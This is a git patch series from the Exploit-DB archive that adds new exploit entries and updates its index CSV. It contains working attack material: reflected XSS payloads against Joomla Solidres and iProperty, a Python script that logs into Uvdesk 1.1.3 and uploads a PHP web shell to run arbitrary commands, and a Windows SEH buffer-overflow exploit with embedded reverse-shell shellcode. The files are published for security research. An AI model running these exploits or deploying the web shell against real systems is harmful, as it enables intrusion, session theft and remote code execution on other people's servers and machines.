From 5eb89a2046eb3008494287259d823ef3f54f74f4 Mon Sep 17 00:00:00 2001
From: Exploit-DB <gitlab@exploit-db.com>
Date: Tue, 1 Aug 2023 00:16:36 +0000
Subject: [PATCH 01/17] DB: 2023-08-01

5 changes to exploits/shellcodes/ghdb

Joomla iProperty Real Estate 4.1.1 - Reflected XSS

Joomla Solidres 2.13.3 - Reflected XSS

RosarioSIS 10.8.4 - CSV Injection

Uvdesk v1.1.3 - File Upload Remote Code Execution (RCE) (Authenticated)

WordPress Plugin AN_Gradebook 5.0.1 - SQLi

General Device Manager 2.5.2.2 - Buffer Overflow (SEH)
---
 exploits/php/webapps/51638.txt  | 56 ++++++++++++++++++++++++
 exploits/php/webapps/51639.py   | 54 +++++++++++++++++++++++
 exploits/php/webapps/51640.txt  | 36 ++++++++++++++++
 exploits/windows/local/51641.py | 76 +++++++++++++++++++++++++++++++++
 files_exploits.csv              |  8 +++-
 5 files changed, 228 insertions(+), 2 deletions(-)
 create mode 100644 exploits/php/webapps/51638.txt
 create mode 100755 exploits/php/webapps/51639.py
 create mode 100644 exploits/php/webapps/51640.txt
 create mode 100755 exploits/windows/local/51641.py

diff --git a/exploits/php/webapps/51638.txt b/exploits/php/webapps/51638.txt
new file mode 100644
index 0000000000..685ed70357
--- /dev/null
+++ b/exploits/php/webapps/51638.txt
@@ -0,0 +1,56 @@
+# Exploit Title: Joomla Solidres 2.13.3 - Reflected XSS
+# Exploit Author: CraCkEr
+# Date: 28/07/2023
+# Vendor: Solidres Team
+# Vendor Homepage: http://solidres.com/
+# Software Link: https://extensions.joomla.org/extension/vertical-markets/booking-a-reservations/solidres/
+# Demo: http://demo.solidres.com/joomla
+# Version: 2.13.3
+# Tested on: Windows 10 Pro
+# Impact: Manipulate the content of the site
+
+
+## Greetings
+
+The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka
+CryptoJob (Twitter) twitter.com/0x0CryptoJob
+
+
+## Description
+
+The attacker can send to victim a link containing a malicious URL in an email or instant message
+can perform a wide variety of actions, such as stealing the victim's session token or login credentials
+
+
+GET parameter 'show' is vulnerable to XSS
+GET parameter 'reviews' is vulnerable to XSS
+GET parameter 'type_id' is vulnerable to XSS
+GET parameter 'distance' is vulnerable to XSS
+GET parameter 'facilities' is vulnerable to XSS
+GET parameter 'categories' is vulnerable to XSS
+GET parameter 'prices' is vulnerable to XSS
+GET parameter 'location' is vulnerable to XSS
+GET parameter 'Itemid' is vulnerable to XSS
+
+
+https://website/joomla/greenery_hub/index.php/en/hotels/reservations?location=d2tff&task=hub.search&ordering=score&direction=desc&type_id=0&show=[XSS]
+
+https://website/joomla/greenery_hub/index.php?option=com_solidres&task=hub.updateFilter&location=italy&checkin=27-07-2023&checkout=28-07-2023&option=com_solidres&Itemid=306&a0b5056f4a0135d4f5296839591a088a=1distance=0-11&distance=0-11&reviews=[XSS]&facilities=18&
+
+https://website/joomla/greenery_hub/index.php/en/hotels/reservations?location=d2tff&task=hub.search&ordering=score&direction=desc&type_id=[XSS]
+
+https://website/joomla/greenery_hub/index.php/en/hotels/reservations?location=italy&checkin=27-07-2023&checkout=28-07-2023&option=com_solidres&task=hub.search&Itemid=306&a0b5056f4a0135d4f5296839591a088a=1distance=0-11&distance=[XSS]&facilities=14
+
+https://website/joomla/greenery_hub/index.php/en/hotels/reservations?location=italy&checkin=27-07-2023&checkout=28-07-2023&option=com_solidres&task=hub.search&Itemid=306&a0b5056f4a0135d4f5296839591a088a=1distance=0-11&distance=0-11&facilities=[XSS]
+
+https://website/joomla/greenery_hub/index.php/en/hotels/reservations?location=italy&checkin=27-07-2023&checkout=28-07-2023&option=com_solidres&task=hub.search&Itemid=306&a0b5056f4a0135d4f5296839591a088a=1distance=0-25&distance=0-25&categories=[XSS]
+
+https://website/joomla/greenery_hub/index.php?option=com_solidres&task=hub.updateFilter&location=d2tff&ordering=distance&direction=asc&prices=[XSS]
+
+https://website/joomla/greenery_hub/index.php/en/hotels/reservations?location=[XSS]&task=hub.search&ordering=score&direction=desc&type_id=11
+
+https://website/joomla/greenery_hub/index.php/en/hotels/reservations?location=italy&checkin=27-07-2023&checkout=28-07-2023&option=com_solidres&task=hub.search&Itemid=[XSS]&a0b5056f4a0135d4f5296839591a088a=1distance=0-11&distance=0-11&facilities=14
+
+
+
+[-] Done
\ No newline at end of file
diff --git a/exploits/php/webapps/51639.py b/exploits/php/webapps/51639.py
new file mode 100755
index 0000000000..887441b126
--- /dev/null
+++ b/exploits/php/webapps/51639.py
@@ -0,0 +1,54 @@
+# Exploit Title: Uvdesk v1.1.3 - File Upload Remote Code Execution (RCE) (Authenticated)
+# Date: 28/07/2023
+# Exploit Author: Daniel Barros (@cupc4k3d) - Hakai Offensive Security
+# Vendor Homepage: https://www.uvdesk.com
+# Software Link: https://github.com/uvdesk/community-skeleton
+# Version: 1.1.3
+# Example: python3 CVE-2023-39147.py -u "http://$ip:8000/" -c "whoami"
+# CVE : CVE-2023-39147
+# Tested on: Ubuntu 20.04.6
+
+
+import requests
+import argparse
+
+def get_args():
+    parser = argparse.ArgumentParser()
+    parser.add_argument('-u', '--url', required=True, action='store', help='Target url')
+    parser.add_argument('-c', '--command', required=True, action='store', help='Command to execute')
+    my_args = parser.parse_args()
+    return my_args
+
+def main():
+    args = get_args()
+    base_url = args.url
+
+    command = args.command
+    uploaded_file = "shell.php"
+    url_cmd = base_url + "//assets/knowledgebase/shell.php?cmd=" + command
+
+# Edit your credentials here
+    login_data = {
+        "_username": "admin@adm.com",
+        "_password": "passwd",
+        "_remember_me": "off"
+    }
+
+    files = {
+        "name": (None, "pwn"),
+        "description": (None, "xxt"),
+        "visibility": (None, "public"),
+        "solutionImage": (uploaded_file, "<?php system($_GET['cmd']); ?>", "image/jpg")
+    }
+
+    s = requests.session()
+    # Login
+    s.post(base_url + "/en/member/login", data=login_data)
+    # Upload
+    upload_response = s.post(base_url + "/en/member/knowledgebase/folders/new", files=files)
+    # Execute command
+    cmd = s.get(url_cmd)
+    print(cmd.text)
+
+if __name__ == "__main__":
+    main()
\ No newline at end of file
diff --git a/exploits/php/webapps/51640.txt b/exploits/php/webapps/51640.txt
new file mode 100644
index 0000000000..68308161c3
--- /dev/null
+++ b/exploits/php/webapps/51640.txt
@@ -0,0 +1,36 @@
+# Exploit Title: Joomla iProperty Real Estate 4.1.1 - Reflected XSS
+# Exploit Author: CraCkEr
+# Date: 29/07/2023
+# Vendor: The Thinkery LLC
+# Vendor Homepage: http://thethinkery.net
+# Software Link: https://extensions.joomla.org/extension/vertical-markets/real-estate/iproperty/
+# Demo: https://iproperty.thethinkery.net/
+# Version: 4.1.1
+# Tested on: Windows 10 Pro
+# Impact: Manipulate the content of the site
+
+
+## Greetings
+
+The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka
+CryptoJob (Twitter) twitter.com/0x0CryptoJob
+
+
+## Description
+
+The attacker can send to victim a link containing a malicious URL in an email or instant message
+can perform a wide variety of actions, such as stealing the victim's session token or login credentials
+
+
+
+Path: /iproperty/property-views/all-properties-with-map
+
+GET parameter 'filter_keyword' is vulnerable to XSS
+
+https://website/iproperty/property-views/all-properties-with-map?filter_keyword=[XSS]&option=com_iproperty&view=allproperties&ipquicksearch=1
+
+
+XSS Payload: pihil"onmouseover="alert(1)"style="position:absolute;width:100%;height:100%;top:0;left:0;"f63m4
+
+
+[-] Done
\ No newline at end of file
diff --git a/exploits/windows/local/51641.py b/exploits/windows/local/51641.py
new file mode 100755
index 0000000000..1cc4905f1a
--- /dev/null
+++ b/exploits/windows/local/51641.py
@@ -0,0 +1,76 @@
+# Exploit Title: General Device Manager 2.5.2.2 - Buffer Overflow (SEH)
+# Date: 30.07.2023
+# Software Link: https://download.xm030.cn/d/MDAwMDA2NTQ=
+# Software Link 2:
+https://www.maxiguvenlik.com/uploads/importfiles/General_DeviceManager.zip
+# Exploit Author: Ahmet Ümit BAYRAM
+# Tested Version: 2.5.2.2
+# Tested on: Windows 10 64bit
+
+# 1.- Run python code : exploit.py
+# 2.- Open pwned.txt and copy all content to clipboard
+# 3.- Open Device Manage and press Add Device
+# 4.- Paste the content of pwned.txt into the 'IP Address'
+# 5.- Click 'OK'
+# 6.- nc.exe local IP Port 1337 and you will have a bind shell
+# 7.- R.I.P. Condor <3
+
+import struct
+
+offset = b"A" * 1308
+
+nseh = b"\xEB\x06\x90\x90" # jmp short
+
+seh = struct.pack('<I', 0x10081827) # 0x10081827 : pop ebx # pop esi # ret  | ascii {PAGE_EXECUTE_READ} [NetSDK.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v4.0.8.66 (C:\Program Files (x86)\DeviceManage\NetSDK.dll)
+
+
+nops = b"\x90" * 32
+
+#shellcode: msfvenom -p windows/shell_reverse_tcp LHOST=127.0.0.1  LPORT=1337 EXITFUNC=thread -a x86 --platform windows -b "\x00\x0a\x0d" -f python --var-name shellcode
+
+shellcode =  b""
+shellcode += b"\xd9\xc6\xbb\xae\xc7\xed\x8e\xd9\x74\x24\xf4"
+shellcode += b"\x5a\x29\xc9\xb1\x52\x83\xea\xfc\x31\x5a\x13"
+shellcode += b"\x03\xf4\xd4\x0f\x7b\xf4\x33\x4d\x84\x04\xc4"
+shellcode += b"\x32\x0c\xe1\xf5\x72\x6a\x62\xa5\x42\xf8\x26"
+shellcode += b"\x4a\x28\xac\xd2\xd9\x5c\x79\xd5\x6a\xea\x5f"
+shellcode += b"\xd8\x6b\x47\xa3\x7b\xe8\x9a\xf0\x5b\xd1\x54"
+shellcode += b"\x05\x9a\x16\x88\xe4\xce\xcf\xc6\x5b\xfe\x64"
+shellcode += b"\x92\x67\x75\x36\x32\xe0\x6a\x8f\x35\xc1\x3d"
+shellcode += b"\x9b\x6f\xc1\xbc\x48\x04\x48\xa6\x8d\x21\x02"
+shellcode += b"\x5d\x65\xdd\x95\xb7\xb7\x1e\x39\xf6\x77\xed"
+shellcode += b"\x43\x3f\xbf\x0e\x36\x49\xc3\xb3\x41\x8e\xb9"
+shellcode += b"\x6f\xc7\x14\x19\xfb\x7f\xf0\x9b\x28\x19\x73"
+shellcode += b"\x97\x85\x6d\xdb\xb4\x18\xa1\x50\xc0\x91\x44"
+shellcode += b"\xb6\x40\xe1\x62\x12\x08\xb1\x0b\x03\xf4\x14"
+shellcode += b"\x33\x53\x57\xc8\x91\x18\x7a\x1d\xa8\x43\x13"
+shellcode += b"\xd2\x81\x7b\xe3\x7c\x91\x08\xd1\x23\x09\x86"
+shellcode += b"\x59\xab\x97\x51\x9d\x86\x60\xcd\x60\x29\x91"
+shellcode += b"\xc4\xa6\x7d\xc1\x7e\x0e\xfe\x8a\x7e\xaf\x2b"
+shellcode += b"\x1c\x2e\x1f\x84\xdd\x9e\xdf\x74\xb6\xf4\xef"
+shellcode += b"\xab\xa6\xf7\x25\xc4\x4d\x02\xae\x94\x91\x0c"
+shellcode += b"\x2f\x03\x90\x0c\x2a\xea\x1d\xea\x5e\x1c\x48"
+shellcode += b"\xa5\xf6\x85\xd1\x3d\x66\x49\xcc\x38\xa8\xc1"
+shellcode += b"\xe3\xbd\x67\x22\x89\xad\x10\xc2\xc4\x8f\xb7"
+shellcode += b"\xdd\xf2\xa7\x54\x4f\x99\x37\x12\x6c\x36\x60"
+shellcode += b"\x73\x42\x4f\xe4\x69\xfd\xf9\x1a\x70\x9b\xc2"
+shellcode += b"\x9e\xaf\x58\xcc\x1f\x3d\xe4\xea\x0f\xfb\xe5"
+shellcode += b"\xb6\x7b\x53\xb0\x60\xd5\x15\x6a\xc3\x8f\xcf"
+shellcode += b"\xc1\x8d\x47\x89\x29\x0e\x11\x96\x67\xf8\xfd"
+shellcode += b"\x27\xde\xbd\x02\x87\xb6\x49\x7b\xf5\x26\xb5"
+shellcode += b"\x56\xbd\x47\x54\x72\xc8\xef\xc1\x17\x71\x72"
+shellcode += b"\xf2\xc2\xb6\x8b\x71\xe6\x46\x68\x69\x83\x43"
+shellcode += b"\x34\x2d\x78\x3e\x25\xd8\x7e\xed\x46\xc9"
+
+
+final_payload = offset + nseh + seh + nops + shellcode
+
+# write the final payload to a file
+try:
+    with open('pwned.txt', 'wb') as f:
+        print("[+] Creating %s bytes evil payload..." %len(final_payload))
+        f.write(final_payload)
+        f.close()
+        print("[+] File created!")
+except:
+    print("File cannot be created!")
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index affafef529..a13f54703d 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -20496,9 +20496,11 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 15164,exploits/php/webapps/15164.txt,"JomSocial 1.8.8 - Arbitrary File Upload",2010-09-30,"Jeff Channell",webapps,php,,2010-09-30,2015-07-12,0,OSVDB-68600,,,,,
 40530,exploits/php/webapps/40530.txt,"JonhCMS 4.5.1 - SQL Injection",2016-10-13,Besim,webapps,php,,2016-10-13,2016-10-13,0,,,,,,
 51629,exploits/php/webapps/51629.txt,"Joomla HikaShop 4.7.4 - Reflected XSS",2023-07-28,CraCkEr,webapps,php,,2023-07-28,2023-07-28,0,,,,,,
+51640,exploits/php/webapps/51640.txt,"Joomla iProperty Real Estate 4.1.1 - Reflected XSS",2023-07-31,CraCkEr,webapps,php,,2023-07-31,2023-07-31,0,,,,,,
 49627,exploits/php/webapps/49627.php,"Joomla JCK Editor 6.4.4 - 'parent' SQL Injection (2)",2021-03-08,"Nicholas Ferreira",webapps,php,,2021-03-08,2021-03-08,0,CVE-2018-17254,,,,,
 50927,exploits/php/webapps/50927.txt,"Joomla Plugin SexyPolling 2.1.7 - SQLi",2022-05-11,"Wolfgang Hotwagner",webapps,php,,2022-05-11,2022-05-11,0,,,,,,
 49064,exploits/php/webapps/49064.txt,"Joomla Plugin Simple Image Gallery Extended (SIGE) 3.5.3 - Multiple Vulnerabilities",2020-11-17,Vulnerability-Lab,webapps,php,,2020-11-17,2020-12-07,0,,,,,,
+51638,exploits/php/webapps/51638.txt,"Joomla Solidres 2.13.3 - Reflected XSS",2023-07-31,CraCkEr,webapps,php,,2023-07-31,2023-07-31,0,,,,,,
 51631,exploits/php/webapps/51631.txt,"Joomla VirtueMart Shopping Cart 4.0.12 - Reflected XSS",2023-07-28,CraCkEr,webapps,php,,2023-07-28,2023-07-28,0,,,,,,
 31857,exploits/php/webapps/31857.txt,"Joomla! / Mambo Component Artists - 'idgalery' SQL Injection",2008-05-28,Cr@zy_King,webapps,php,,2008-05-28,2014-02-24,1,,,,,,https://www.securityfocus.com/bid/29407/info
 31529,exploits/php/webapps/31529.txt,"Joomla! / Mambo Component Cinema 1.0 - 'id' SQL Injection",2008-03-23,S@BUN,webapps,php,,2008-03-23,2014-02-10,1,,,,,,https://www.securityfocus.com/bid/28427/info
@@ -28789,7 +28791,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 5675,exploits/php/webapps/5675.txt,"RoomPHPlanning 1.5 - Multiple SQL Injections",2008-05-26,"Virangar Security",webapps,php,,2008-05-25,,1,OSVDB-53397;CVE-2008-6634,,,,,
 8198,exploits/php/webapps/8198.pl,"RoomPHPlanning 1.6 - 'userform.php' Create Admin User",2009-03-10,"Jonathan Salwan",webapps,php,,2009-03-09,2016-12-02,1,,,,,http://www.exploit-db.comrp_1.6.zip,
 8797,exploits/php/webapps/8797.txt,"roomphplanning 1.6 - Multiple Vulnerabilities",2009-05-26,"ThE g0bL!N",webapps,php,,2009-05-25,2016-12-02,1,OSVDB-62791;CVE-2009-4671;OSVDB-54772;CVE-2009-4670;OSVDB-54771;CVE-2009-4669;OSVDB-54770;OSVDB-54769,,,,http://www.exploit-db.comrp_1.6.zip,
-51622,exploits/php/webapps/51622.txt,"RosarioSIS 10.8.4 - CSV Injection",2023-07-28,"Ranjeet Jaiswal",webapps,php,,2023-07-28,2023-07-28,0,CVE-2023-29918,,,,,
+51622,exploits/php/webapps/51622.txt,"RosarioSIS 10.8.4 - CSV Injection",2023-07-28,"Ranjeet Jaiswal",webapps,php,,2023-07-28,2023-07-31,1,CVE-2023-29918,,,,,
 10793,exploits/php/webapps/10793.txt,"RoseOnlineCMS 3 B1 - 'admin' Local File Inclusion",2009-12-30,cr4wl3r,webapps,php,,2009-12-29,,1,OSVDB-61563;CVE-2009-4581,,,,,
 11158,exploits/php/webapps/11158.txt,"RoseOnlineCMS 3 B1 - Remote Authentication Bypass",2010-01-16,cr4wl3r,webapps,php,,2010-01-15,,1,,,,,http://www.exploit-db.comRoseOnlineCMS_v3_b1.rar,
 3548,exploits/php/webapps/3548.pl,"RoseOnlineCMS 3 beta2 - 'op' Local File Inclusion",2007-03-23,GoLd_M,webapps,php,,2007-03-22,2016-09-30,1,OSVDB-38601;CVE-2007-1636,,,,http://www.exploit-db.comRoseOnlineCMS_v3_B1.rar,
@@ -31314,6 +31316,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 1240,exploits/php/webapps/1240.php,"Utopia News Pro 1.1.3 - 'news.php' SQL Injection",2005-10-06,rgod,webapps,php,,2005-10-05,,1,OSVDB-19942;CVE-2005-3201,,,,,
 18720,exploits/php/webapps/18720.txt,"Utopia News Pro 1.4.0 - Cross-Site Request Forgery (Add Admin)",2012-04-08,Dr.NaNo,webapps,php,,2012-04-08,2012-04-08,1,OSVDB-80986;CVE-2012-4325,,,,http://www.exploit-db.comnewspro140b.zip,
 13854,exploits/php/webapps/13854.txt,"UTStats - Cross-Site Scripting / SQL Injection / Full Path Disclosure",2010-06-13,"LuM Member",webapps,php,,2010-06-12,,1,CVE-2010-5009;CVE-2010-5007;OSVDB-76896;OSVDB-76894,,,,,
+51639,exploits/php/webapps/51639.py,"Uvdesk v1.1.3 - File Upload Remote Code Execution (RCE) (Authenticated)",2023-07-31,"Daniel Barros",webapps,php,,2023-07-31,2023-07-31,0,CVE-2023-39147,,,,,
 44223,exploits/php/webapps/44223.txt,"uWSGI < 2.0.17 - Directory Traversal",2018-03-02,"Marios Nicolaides",webapps,php,,2018-03-02,2018-03-02,1,CVE-2018-7490,,,,http://www.exploit-db.comuwsgi-2.0.15.tar.gz,
 34218,exploits/php/webapps/34218.txt,"V-EVA Classified Script 5.1 - 'classified_img.php' SQL Injection",2010-06-28,Sid3^effects,webapps,php,,2010-06-28,2014-07-31,1,,,,,,https://www.securityfocus.com/bid/41204/info
 27245,exploits/php/webapps/27245.txt,"V-Webmail 1.6.2 - Multiple Cross-Site Scripting Vulnerabilities",2006-02-17,$um$id,webapps,php,,2006-02-17,2013-07-31,1,CVE-2006-0792;OSVDB-23260,,,,,https://www.securityfocus.com/bid/16706/info
@@ -32648,7 +32651,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 40771,exploits/php/webapps/40771.txt,"WordPress Plugin Answer My Question 1.3 - SQL Injection",2016-11-17,"Lenon Leite",webapps,php,,2016-11-17,2016-11-17,1,,,,http://www.exploit-db.com/screenshots/idlt41000/screen-shot-2016-11-17-at-161058.png,http://www.exploit-db.comanswer-my-question.zip,
 46618,exploits/php/webapps/46618.txt,"WordPress Plugin Anti-Malware Security and Brute-Force Firewall 4.18.63 - Local File Inclusion (PoC)",2019-03-28,"Ali S. Ahmad",webapps,php,80,2019-03-28,2019-07-05,0,,"File Inclusion (LFI/RFI)",,,http://www.exploit-db.comgotmls.4.18.63.zip,
 50107,exploits/php/webapps/50107.py,"WordPress Plugin Anti-Malware Security and Bruteforce Firewall 4.20.59 - Directory Traversal",2021-07-06,TheSmuggler,webapps,php,,2021-07-06,2021-10-29,0,,,,,http://www.exploit-db.comgotmls.4.20.59.zip,
-51632,exploits/php/webapps/51632.py,"WordPress Plugin AN_Gradebook 5.0.1 - SQLi",2023-07-28,"Lukas Kinneberg",webapps,php,,2023-07-28,2023-07-28,0,CVE-2023-2636,,,,,
+51632,exploits/php/webapps/51632.py,"WordPress Plugin AN_Gradebook 5.0.1 - SQLi",2023-07-28,"Lukas Kinneberg",webapps,php,,2023-07-28,2023-07-31,1,CVE-2023-2636,,,,,
 48204,exploits/php/webapps/48204.txt,"WordPress Plugin Appointment Booking Calendar 1.3.34 - CSV Injection",2020-03-12,"Daniel Monzón",webapps,php,,2020-03-12,2020-03-12,0,CVE-2020-9372;CVE-2020-9371,,,,http://www.exploit-db.comappointment-booking-calendar.zip,
 41568,exploits/php/webapps/41568.txt,"WordPress Plugin Apptha Slider Gallery 1.0 - Arbitrary File Download",2017-03-09,"Ihsan Sencan",webapps,php,,2017-03-09,2017-03-09,0,,,,,,
 41567,exploits/php/webapps/41567.txt,"WordPress Plugin Apptha Slider Gallery 1.0 - SQL Injection",2017-03-09,"Ihsan Sencan",webapps,php,,2017-03-09,2017-03-09,0,,,,,,
@@ -40047,6 +40050,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 51584,exploits/windows/local/51584.txt,"Game Jackal Server v5 - Unquoted Service Path _GJServiceV5_",2023-07-11,"Idan Malihi",local,windows,,2023-07-11,2023-07-11,0,CVE-2023-36166,,,,,
 40069,exploits/windows/local/40069.cpp,"GE Proficy HMI/SCADA CIMPLICITY 8.2 - Local Privilege Escalation",2016-07-07,"Zhou Yu",local,windows,,2016-07-07,2016-07-07,0,,,,,,
 41972,exploits/windows/local/41972.txt,"Gemalto SmartDiag Diagnosis Tool < 2.5 - Local Buffer Overflow (SEH)",2017-05-08,"Majid Alqabandi",local,windows,,2017-05-08,2017-05-09,1,CVE-2017-6953,,,http://www.exploit-db.com/screenshots/idlt42000/screen-shot-2017-05-08-at-152336.png,http://www.exploit-db.comSmartDiag_en.msi,
+51641,exploits/windows/local/51641.py,"General Device Manager 2.5.2.2 - Buffer Overflow (SEH)",2023-07-31,"Ahmet Ümit BAYRAM",local,windows,,2023-07-31,2023-07-31,0,,,,,,
 49007,exploits/windows/local/49007.txt,"Genexus Protection Server 9.6.4.2 - 'protsrvservice' Unquoted Service Path",2020-11-09,SamAlucard,local,windows,,2020-11-09,2020-11-09,0,,,,,,
 49655,exploits/windows/local/49655.py,"GeoGebra CAS Calculato‪r‬ 6.0.631.0 - Denial of Service (PoC)",2021-03-16,"Brian Rodriguez",local,windows,,2021-03-16,2021-10-28,0,,,,,,
 49654,exploits/windows/local/49654.py,"GeoGebra Classic 5.0.631.0-d - Denial of Service (PoC)",2021-03-16,"Brian Rodriguez",local,windows,,2021-03-16,2021-10-28,0,,,,,,

From 9229ea6f66bb8ab3854a7c3178c7506eb3165749 Mon Sep 17 00:00:00 2001
From: Exploit-DB <gitlab@exploit-db.com>
Date: Thu, 3 Aug 2023 00:16:49 +0000
Subject: [PATCH 02/17] DB: 2023-08-03

1 changes to exploits/shellcodes/ghdb

Bookwyrm v0.4.3 - Authentication Bypass

Gitea 1.16.6 - Remote Code Execution (RCE) (Metasploit)

Uvdesk v1.1.3 - File Upload Remote Code Execution (RCE) (Authenticated)

WordPress Plugin Duplicator 1.4.7 - Information Disclosure

Wordpress Plugin WP-UserOnline 2.88.0 - Stored Cross Site Scripting (XSS)
---
 files_exploits.csv | 10 +++++-----
 1 file changed, 5 insertions(+), 5 deletions(-)

diff --git a/files_exploits.csv b/files_exploits.csv
index a13f54703d..ee5130d6c7 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -11647,7 +11647,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 33995,exploits/multiple/webapps/33995.txt,"Blaze Apps 1.x - SQL Injection / HTML Injection",2010-01-19,"AmnPardaz Security Research Team",webapps,multiple,,2010-01-19,2014-07-07,1,,,,,,https://www.securityfocus.com/bid/40212/info
 49759,exploits/multiple/webapps/49759.txt,"Blitar Tourism 1.0 - Authentication Bypass SQLi",2021-04-13,sigeri94,webapps,multiple,,2021-04-13,2021-04-13,0,,,,,,
 48701,exploits/multiple/webapps/48701.txt,"Bludit 3.9.2 - Directory Traversal",2020-07-26,"James Green",webapps,multiple,,2020-07-26,2020-07-26,0,CVE-2019-16113,,,,,
-51013,exploits/multiple/webapps/51013.txt,"Bookwyrm v0.4.3 - Authentication Bypass",2022-09-20,"Akshay Ravi",webapps,multiple,,2022-09-20,2022-09-20,0,CVE-2022-2651,,,,,
+51013,exploits/multiple/webapps/51013.txt,"Bookwyrm v0.4.3 - Authentication Bypass",2022-09-20,"Akshay Ravi",webapps,multiple,,2022-09-20,2023-08-02,1,CVE-2022-2651,,,,,
 9872,exploits/multiple/webapps/9872.txt,"boxalino 09.05.25-0421 - Directory Traversal",2009-10-20,"Axel Neumann",webapps,multiple,,2009-10-19,,1,CVE-2009-1479;OSVDB-59145,,,,,
 44256,exploits/multiple/webapps/44256.html,"Bravo Tejari Web Portal - Cross-Site Request Forgery",2018-03-06,"Arvind V",webapps,multiple,,2018-03-06,2018-03-06,0,CVE-2018-7216,,,,,
 48649,exploits/multiple/webapps/48649.txt,"BSA Radar 1.6.7234.24750 - Authenticated Privilege Escalation",2020-07-07,"William Summerhill",webapps,multiple,,2020-07-07,2020-07-07,0,CVE-2020-14945,,,,,
@@ -11807,7 +11807,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 50181,exploits/multiple/webapps/50181.py,"GFI Mail Archiver 15.1 - Telerik UI Component Arbitrary File Upload (Unauthenticated)",2021-08-05,"Amin Bohio",webapps,multiple,,2021-08-05,2021-08-05,0,,,,,,
 47407,exploits/multiple/webapps/47407.txt,"Gila CMS < 1.11.1 - Local File Inclusion",2019-09-23,"Sainadh Jamalpur",webapps,multiple,,2019-09-23,2019-09-23,0,CVE-2019-16679,,,,http://www.exploit-db.comgila-1.10.9.zip,
 49571,exploits/multiple/webapps/49571.py,"Gitea 1.12.5 - Remote Code Execution (Authenticated)",2021-02-18,Podalirius,webapps,multiple,,2021-02-18,2021-06-14,0,,,,,,
-51009,exploits/multiple/webapps/51009.rb,"Gitea 1.16.6 - Remote Code Execution (RCE) (Metasploit)",2022-09-15,samguy,webapps,multiple,,2022-09-15,2022-09-15,0,CVE-2022-30781,,,,,
+51009,exploits/multiple/webapps/51009.rb,"Gitea 1.16.6 - Remote Code Execution (RCE) (Metasploit)",2022-09-15,samguy,webapps,multiple,,2022-09-15,2023-08-02,1,CVE-2022-30781,,,,,
 44996,exploits/multiple/webapps/44996.py,"Gitea 1.4.0 - Remote Code Execution",2018-07-04,"Kacper Szurek",webapps,multiple,,2018-07-10,2018-07-10,0,,,,,,https://security.szurek.pl/gitea-1-4-0-unauthenticated-rce.html
 49383,exploits/multiple/webapps/49383.py,"Gitea 1.7.5 - Remote Code Execution",2021-01-06,1F98D,webapps,multiple,,2021-01-06,2021-04-01,1,CVE-2019-11229,,,,,
 42392,exploits/multiple/webapps/42392.py,"GitHub Enterprise < 2.8.7 - Remote Code Execution",2017-03-15,orange,webapps,multiple,,2017-07-29,2017-07-29,0,,,,,,http://blog.orange.tw/2017/07/how-i-chained-4-vulnerabilities-on.html
@@ -31316,7 +31316,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 1240,exploits/php/webapps/1240.php,"Utopia News Pro 1.1.3 - 'news.php' SQL Injection",2005-10-06,rgod,webapps,php,,2005-10-05,,1,OSVDB-19942;CVE-2005-3201,,,,,
 18720,exploits/php/webapps/18720.txt,"Utopia News Pro 1.4.0 - Cross-Site Request Forgery (Add Admin)",2012-04-08,Dr.NaNo,webapps,php,,2012-04-08,2012-04-08,1,OSVDB-80986;CVE-2012-4325,,,,http://www.exploit-db.comnewspro140b.zip,
 13854,exploits/php/webapps/13854.txt,"UTStats - Cross-Site Scripting / SQL Injection / Full Path Disclosure",2010-06-13,"LuM Member",webapps,php,,2010-06-12,,1,CVE-2010-5009;CVE-2010-5007;OSVDB-76896;OSVDB-76894,,,,,
-51639,exploits/php/webapps/51639.py,"Uvdesk v1.1.3 - File Upload Remote Code Execution (RCE) (Authenticated)",2023-07-31,"Daniel Barros",webapps,php,,2023-07-31,2023-07-31,0,CVE-2023-39147,,,,,
+51639,exploits/php/webapps/51639.py,"Uvdesk v1.1.3 - File Upload Remote Code Execution (RCE) (Authenticated)",2023-07-31,"Daniel Barros",webapps,php,,2023-07-31,2023-08-02,1,CVE-2023-39147,,,,,
 44223,exploits/php/webapps/44223.txt,"uWSGI < 2.0.17 - Directory Traversal",2018-03-02,"Marios Nicolaides",webapps,php,,2018-03-02,2018-03-02,1,CVE-2018-7490,,,,http://www.exploit-db.comuwsgi-2.0.15.tar.gz,
 34218,exploits/php/webapps/34218.txt,"V-EVA Classified Script 5.1 - 'classified_img.php' SQL Injection",2010-06-28,Sid3^effects,webapps,php,,2010-06-28,2014-07-31,1,,,,,,https://www.securityfocus.com/bid/41204/info
 27245,exploits/php/webapps/27245.txt,"V-Webmail 1.6.2 - Multiple Cross-Site Scripting Vulnerabilities",2006-02-17,$um$id,webapps,php,,2006-02-17,2013-07-31,1,CVE-2006-0792;OSVDB-23260,,,,,https://www.securityfocus.com/bid/16706/info
@@ -32849,7 +32849,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 50420,exploits/php/webapps/50420.py,"Wordpress Plugin Duplicator 1.3.26 - Unauthenticated Arbitrary File Read",2021-10-18,nam3lum,webapps,php,,2021-10-18,2021-10-18,0,CVE-2020-11738,,,,,
 49288,exploits/php/webapps/49288.rb,"Wordpress Plugin Duplicator 1.3.26 - Unauthenticated Arbitrary File Read (Metasploit)",2020-12-18,"SunCSR Team",webapps,php,,2020-12-18,2020-12-18,1,,,,,,
 50992,exploits/php/webapps/50992.txt,"WordPress Plugin Duplicator 1.4.6 - Unauthenticated Backup Download",2022-08-01,SecuriTrust,webapps,php,,2022-08-01,2022-08-01,0,CVE-2022-2551,,,,,
